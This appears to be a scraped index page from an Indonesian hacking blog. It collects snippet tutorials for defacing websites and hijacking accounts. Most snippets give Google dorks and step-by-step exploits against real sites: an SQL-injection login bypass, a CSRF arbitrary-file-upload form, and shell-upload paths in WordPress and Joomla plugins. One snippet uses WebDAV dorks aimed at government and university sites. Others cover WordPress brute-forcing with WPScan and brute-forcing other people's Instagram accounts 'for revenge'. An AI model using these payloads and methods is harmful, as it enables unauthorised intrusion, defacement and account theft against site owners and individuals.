Blood Tears No Team Squad

squadcyber.org  - Wordpresscan adalah tool untuk meng-eksploitasi website yang menggunakan CMS WordPress  , tool ini fungsi nya hampir mirip seperti WPScan  dan WPSeku  yang pernah gw kasih tutorial nya di postingan sebelum nya. Baca juga : - Cara Install WPScan di Termux                     - Cara Install WPSeku di Termux Cara Install Wordpresscan di Termux buka termux kalian dan tuliskan kode di bawah ini. $ apt update && apt upgrade $ apt install git $ apt install python2 python2-dev clang libxml2-dev libxml2-utils libxslt-dev $ git clone https://github.com/swisskyrepo/Wordpresscan.git $ cd Wordpresscan $ pip2 install -r requirements.txt Tunggu proses instalasi modul python nya hingga selesai, proses instalasi modul python memakan waktu yang agak lama. Dan untuk menjalankan nya kalian cukup mengetikkan. $ python2 main.py Demikian tutorial  Cara Install Wordpres...

www.squadcyber.org - Yoho balik lageh ma ane :v Sory jarang update soalnya ane lagi UASu :v Maklum anak skolahan :v Kali ini wa bakal kasih turtor pepes dengan metode Myflip. Langsung sadja ea :v Bahan" : Dork : intext:Copyright 2014 - 2014. Powered by MyFlipMarket.com (kembangin biar crutzzzz) Exploit : /admincp/index.php Username sama password : ' or 1=1 limit 1 -- -+ Dah ah langsung sadja :v 1. Dorking pakek dork diatas di mesin cuci :v 2. Kalo udah tambahin exploit nya :v kurang jelas liat gambar. Lalu masukin username dan passwordnya dengan ' or 1=1 limit 1 -- -+ lalu klik login. 3. Udah masuk? Pilih menu setting :v 4. Dah noh tinggal di ubah", ditikung juga boleh kok buat kmu :* Kalo udah klik update lalu cek hasilnya :v 5. Done eak :v Simple kan ^.^ Kalo susah nyari ya tinggal tykung sadja punya orang :v Sekian dari ane :v Dah ah mau lanjot blajar :v Thanks :*

squadcyber.org -  Kali ini gw bagiin Daftar Domain di Seluruh Dunia ( update 2017 ), ini juga dapat membantu kalian pada waktu dorking web untuk di eksploitasi, mari kita simak di bawah ini. No Nama Negara Nama Domain (ccTLD) 1 Afganistan .af 2 Afrika Selatan .za 3 Afrika Tengah .cf 4 Albania .al 5 Algeria .dz 6 Amerika Serikat .us 7 Andorra .ad 8 Angola .ao 9 Antigua & Barbuda .ag 10 Arab Saudi .sa 11 Argentina .ar 12 Armenia .am 13 Australia .au 14 Austria .at 15 Azerbaijan .az 16 Bahama .bs 17 Bahrain .bh 18 Bangladesh .bd 19 Barbados .bb 20 Belanda .nl 21 Belarus .by 22 Belgia .be 23 Belize .bz 24 Benin .bj 25 Bhutan .bt 26 Bolivia .bo 27 Bosnia & Herzegovina .ba 28 Botswana .bw 29 Brasil .br 30 Britania Raya (Inggris) .uk 31 Brunei Darussalam .bn 32 Bulgaria .bg 33 Burkina Faso .bf 34 Burundi ...

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

squadcyber.org - WPScan adalah tool untuk menguji kerentanan sebuah website yang menggunakan CMS Wordpress, tapi keterangan yang ditulis di wpscan.org menerangkan bahwa WPScan hanya bisa di jalankan pada platform Linux dan tidak mendukung sitem operasi Windows. Namun kini WPScan tidak hanya bisa berjalan pada Os Linux, Pengguna Windows pun bisa menggunakannya juga, bagaimana cara nya? simak tutorial berikut. Download Bahan - Bahan nya Download   Ruby 2.3.3    |   alternative  link Download   DevKit 4.52    |   alternative  link Download   Libcurl.dll    |   alternative  link Download   WPScan 2.9.2    |   alternative  link Cara Install WPScan di Windows Install Ruby Buka ruby installer tadi yang sudah di download, pilih bahasa nya dan pilih accept the license, lalu klik next Pilih dimana kalian akan install ruby nya, dan centang semua nya lalu klik inst...

Yo guys balik lagi bersama ane :v kali ini wa kasih turtor pepes metode Wordpress Easy Gallery Pro. Cukup lama sih tpi gk ada salahnya kan di share lagi? :v Langsung euy :v Bahan" : Dork : /wp-content/plugins/wp-easy-gallery-pro/ ( kembangin) CSRF : touch here~! Exploit : www.site.co.li /wp-content/plugins/wp-easy-gallery-pro/admin/php.php Langsung sadja :v 1. Dorking pakek dork diatas :v 2. Kalo udah nemu target langsung masukin exploit nya. Vuln? Cek gambar di bawah :v   3. Langsung buka CSRF online diatas lalu masukin url dan untuk postfile nya isi dengan "qqfile" Kurang jelas? cek gambar dung :v Klik kunci lalu browse file trus klik genjot :v 4. Sukses? bakal kek gambar dibawah :v 5. Akses? cek di www.site.co.li /wp-content/uploads/shellll.php 6. Done ea :v coba sadja up shell, siapa tau bisa :v Sekian dari ane :v Maap kalo kurang jelas/salah :v Thanks :*

Yoo guys balik lagi ma ane :v Kali ini wa bakal kasih tutor pepes pakek metode Webdav shell maker buatan Hmei7 :v Ini khusus buat lamer kayak ane aja yah. Para mastah/guru/sensei minggir dulu ea :v Yok langsung :v Bahan" : Dork :  “Powered by IIS” intitle:"Directory Listing For /" + inurl:webdav tomcat intitle:"Directory Listing For /" + inurl:webdav inurl:*.edu/*.asp inurl:.gov.*/*.asp inurl:*.gov/*.asp inurl:.org/*.asp inurl:.ag/*.asp inurl:.it/*.asp inurl:.uk/*.asp inurl:.co.il/*.asp inurl:.com/*.asp inurl:.co.id/*.asp inurl:.ah.cn/*.asp inurl:.bj.cn/*.asp inurl:.cq.cn/*.asp inurl:.fj.cn/*.asp inurl:.gd.cn/*.asp inurl:.gs.cn/*.asp inurl:.gz.cn/*.asp inurl:.gx.cn/*.asp inurl:.ha.cn/*.asp inurl:.hb.cn/*.asp inurl:.he.cn/*.asp inurl:.hi.cn/*.asp inurl:.hl.cn/*.asp inurl:.hn.cn/*.asp inurl:.jl.cn/*.asp inurl:.js.cn/*.asp inurl:.jx.cn/*.asp inurl:.ln.cn/*.asp inurl:.nm.cn/*.asp inurl:.nx.cn/*.asp inurl:.qh.cn/*.asp inurl:....

squadcyber.org  - Instagram adalah sosial media yang mungkin sangat kita butuhkan dalam sehari - hari, entah itu untuk bisnis atau hanya untuk hiburan semata, dan mungkin ada sebagian ingin mengambil hak akun instagram orang lain di sebabkan jengkel atau balas dendam pada mantan nya :v . Setelah kemaren gw membagikan tutorial  Hack Akun Sosial Media Dengan Phising  , kali ini gw akan bagiin tutorial Hack Akun Instagram Dengan Bruteforce . Bruteforce sendiri adalah cara lama yang di gunakan para cracker untuk menjebol password suatu keamanan dengan mencoba memasukkan password acak yang di kumpulkan di suatu list, keberhasilan bruteforce sendiri tergantung tepat nya wordlist yang di gunakan dan kelalaian victim kita. Cara Install Instagram Bruteforce $ apt install python $ apt install python2 $ pip install stem pysocks instagram-py $ pip2 install requests Cara Penggunaan Instagram Bruteforce $ instagram-py -c -vvv -u username -p wordlist.txt Untuk wordlist...

squadcyber.org - Yooo balik lagi. Kali ini gw mau share metode yang cocok buat nuwbie kayak wa >.< Silahkan di simak. Bahan : Dork : inurl:"viewTable?cid=" site:it (kembangin) Exploit : www.site.com/[path]/ index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 Langsung sadja :v 1. Dorking pakek dork diatas :v 2. Vuln bakal muncul kek gini :v Masukin exploit nya :v 3. Browse file kalean lalu klik import CSV :v 4. Akses nya di www.site.co.li/[path]/media/namafilelu.html Mudah kan >.< Sekian dari ane :v Maap kalo salah/kurang jelas >.< Maklum wa kan nubie :( Thanks :*

squadcyber.org - Yooo whasap guys :v masih ama ane lagi neh :v Kali ini wa share poc Wordpress Plugins Mobile Detector Shell Upload. Lanjott tot :v Bahan" : Dork : inurl:"/wp-content/plugins/wp-mobile-detector/" Exploit nya : www.site.co.li/ wp-content/plugins/wp-mobile-detector/resize.php Bekas deface kalean (masak gk ada sama sekali? :v) TKP :v 1. Dorking dolo deh :v 2. Kalo udah masukin exploit nya atau bisa cek gambar di bawah. 3. Kalo udah saat nya di ekse :v masukin bekas depesan kalian di url. Contoh www.site.co.li/ wp-content/plugins/wp-mobile-detector/resize.php?src= bekas depesan lu. Kurang jelas cek gambar :v 4. Done ea :v Sekian dari ane >.< Maap kalo salah/kurang jelas ^.^ Thanks :*